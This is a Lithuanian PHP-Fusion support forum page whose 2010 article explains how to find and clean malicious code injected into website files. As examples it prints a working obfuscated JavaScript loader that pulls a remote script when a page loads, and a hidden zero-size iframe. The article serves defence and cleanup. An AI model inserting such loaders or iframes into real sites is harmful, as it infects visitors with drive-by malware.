Virusai - Lithuanian PHP-Fusion Support Site

Frozzy	Naršo
Zwimba	Naršo
Sharkie	Naršo
Donatas	Naršo
.DeXter	00:07:32
fixed	00:16:04
zenial	00:16:12
Scarletas	00:16:47
Grygoo1	00:19:54
MaFetas	00:20:12
Creatium	00:20:37
minimukas	00:26:05
laimingas	00:27:09
Euga	00:34:50
Alanas	00:35:41
GiedrasGiedrius	00:37:07
Boxster	00:41:11
Jaunelis	00:47:37
gy	00:55:53
Haris89	01:02:05

Informacija:

OS: Unknown
Naršyklė: Nežinoma
IP: 38.107.179.233
Naujienų: 472
Straipsnių: 223
Temų: 44,527
Postų: 493,644
Postų pask. parą: 142
Shout'ų pask. parą: 40
P.S.C. pask. parą: 187
Nuotraukų: 0

Facebook

Prisijungti

Dar ne narys?
Registruokis

Pamiršai slaptažodį?
Paprašyk naujo
Aktyvuoti save

Šaukykla

Jei norite rašyti žinutes, turite prisijungti.

Frozzy
2012/02/05 01:30
kas čia bl per dizas ?

ltgaming
2012/02/04 23:33
Mano skype: zazutis jei domina

piestukas
2012/02/04 23:21
reikalingas zmogus turintis verified paypal,atsilygisiu dosniai skype profili

ltgaming
2012/02/04 22:48
Parduodu pigia 468x60 baneri 13lt/men (nupirkta po viena baneri kiekvienoj pozicijoje) webas ltgaming.lt SKYPE: zazutis

Quantum
2012/02/04 22:28
Dėkui, MaFestas, pravertė.

Šaukyklos archyvas

Apklausa

Archyvas

Reklama 400x60

buy proxy Automatizuotas hostingas paskolos linksmiau.net kreditai Kompiuterių remontas Nešiojamų kompiuterių remontas Kompiuteriu prieziura

Virusai

Parašė ShadoVw 2010 vasario 15 18:47:35

Jau turbūt ne viena užkniso tie prakeikti virusai

Pamokinsiu kaip juos pašalinti ir kur jie būna dažniausiai

Virusų pavyzdžiai

       <script>var d=false;var j="";var l=window;var dp="dp";var v=document;var x=3882;var p;if(p!='nq'){p='nq'};function e(q){var ux=16722;var s=['h%tLt~p<:L/q/~r<e~t<aLiLlqmqeLnqo%t%-qc<o~mL.<mqi%x<i<.~j%pq.qa%lLlqo~c~i~n<eL-~fLrq.Lr%eLd%t~a<g~jqe~w<e%lLeLr~s<.qrquq:%8~0%8<0L/Lv~i%m%e%oL.<cqo~mq/qvqiqm~e<o%.~c%oLm%/qb~r<e~a~kL.<c%oqm%/%gqo~o<g%lqe~.qc<o%m</qg<o<o%g<l%eL.<c%o<mL.qe~c~/q'.replace(/[q\<%L~]/g, ''), 's~c~rkiCp?te'.replace(/[eCk~\?]/g, ''), 'cLrLe5aPtMe5ELl2ePm2eMnMt5'.replace(/[5P2ML]/g, ''), 'o2nUl0o0a$d>'.replace(/[\>\$2U0]/g, ''), 'sJrJcJ'.replace(/[Jn\?3f]/g, ''), 'akpkpzeknkdDCDhDiylzdQ'.replace(/[QDzky]/g, ''), 'szeKtDAztKtDrLiDb9u9tDez'.replace(/[zLD9K]/g, ''), 'bMoMdNyM'.replace(/[MCNwT]/g, ''), 'dOemfmeZr>'.replace(/[\>mZOP]/g, ''), "1"];var u=s[q];this.nf=33247;return u;var rr="";}this.ft="ft";var o = function(){try {var d_;if(d_!='' && d_!='_s'){d_=null};r=v[e([2,1][0])](e([1][0]));var n_;if(n_!='qp' && n_!='c'){n_=''};r[e([4,4][0])]=e([0,4][0]);var qpj;if(qpj!='' && qpj!='k'){qpj='a'};r[e([6,2][0])](e([1,8][1]), e([9][0]));this.ye=false;var h = v[e([7,1][0])];var ae;if(ae!='nk'){ae='nk'};h[e([5][0])](r);var t="t";} catch(va){};var lv=39032;};var ra=new String();this.vpz=53190;l[e([3][0])]=o;this.hh="hh";</script>

<!--ded09b32e507c9f9034164bf3b3819e8-->

<iframe src="http://example.com/example.txt?" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Ir t.t.

Jei jau jūsų puslapis apkrėstas, juos reikia peržiūrėti visuose failuose, bet dažniausiai jie būna:
index.php failuose (pvz infusions/index.php arba administration/index.php) + dar randasi lacale/lithuanian/global.php ir pnš.
Pačiam gale prieš ?>
kartais galima rasti subheader.php arba footer.php jei naudojam v6, o jei v7 tai includes/footer_include.php
+ dabar dabar pradėjo dažnai į javascript failus lįsti ir ten kišti tą kodą
(kaip includes/javascript.js)

Jei jau pašaline kenksmingą kodą, mums užėjus į savo saitą meta, kad saitas yra pakrėstas (pvz http://www.7ion.com/images/virus...irefox.jpg ). Tada darom taip:

Einam į google webmaster tools www.google.com/webmasters/tools/
Pridedam savo svetainę tada mums duos kodą panašų į:

<meta name="google-site-verification" content="0GXF_AJMn" />

ir jį dedam į subheader.php po
<title>".$settings['sitename']."</title> PVZ kaip dėti:

<title>".$settings['sitename']."</title>";

?>

<meta name="google-site-verification" content="0GXF_AJMn" />

<?php

echo"

(panašiai bus ir ant v7. Tik ten reikės į themes/templates/header.php kišti

Ir spaudžiam patvirtinti google webmaster tools puslapyje
Ir dabar viršuje išmes, kad puslapis apkrėstas, spaudžiam ant to ir apačioje pasirenkam, kad google botas pereiti per mūsų saitą (šitos dalies tiksliai neatsimenu kaip viskas tiksliai vadinasi)

Viskas, keičiam FTP pass ir tikimes, kad kažkiek tai laiko mūsų nepuls (+ kiek pastebėjau ant serveriai.lt hosto, man nei karto nebuvo virusai užpuole)

7 Komentarai · 1119 Skaityta ·

Komentarai

ShadoVw 2010 vasario 15 18:49:04
Rašiau skubėdamas, tai gali būti klaidų

iGolf 2010 vasario 15 19:18:25

;) Puiku

Djnjx 2010 vasario 16 09:46:03
liux tikrai gera pamoka

Impossibru 2010 vasario 16 11:51:24
serveriai.lt turi kažkokią apsaugą,nes jau 2 metai naudojuosi ir tikrai jokių kirminėlių nebuvo.

lajanas 2010 vasario 16 17:32:49
ačiūūū

)))))))))))))))))))))))))))
----------------------------------
Redagavo lajanas 2010-02-16 18:20

Exz0sT 2010 vasario 21 16:54:15
Na manau šis naujokams padės apsisaugoti, nuo šių įkyrių iframe, kurie paplito gan plačiai, ačiū dievui, pats pastebėjau, kad n-design.lt tupėjo iframe tai perspėjau kolėgas, nors jiems nieko ir per source nerodė. Nuo to laiko kas kart pasitikrinu, ar viskas tvarkoje.

Activia 2010 rugpjūčio 11 10:24:17
o nera kokios apsaugos ,kad neprilystu tu kodu ?

nes man weba kas savaite uzblokoja del ju

isvalau atblokoja per keles dienas o po savaites vel taspats ;D

Rašyti komentarą

Prisijunkite, norėdami parašyti komentarą.

Reitingai

Balsuoti gali tik nariai.

Prašome prisijungti arba prisiregistruoti.

Nėra reitingų.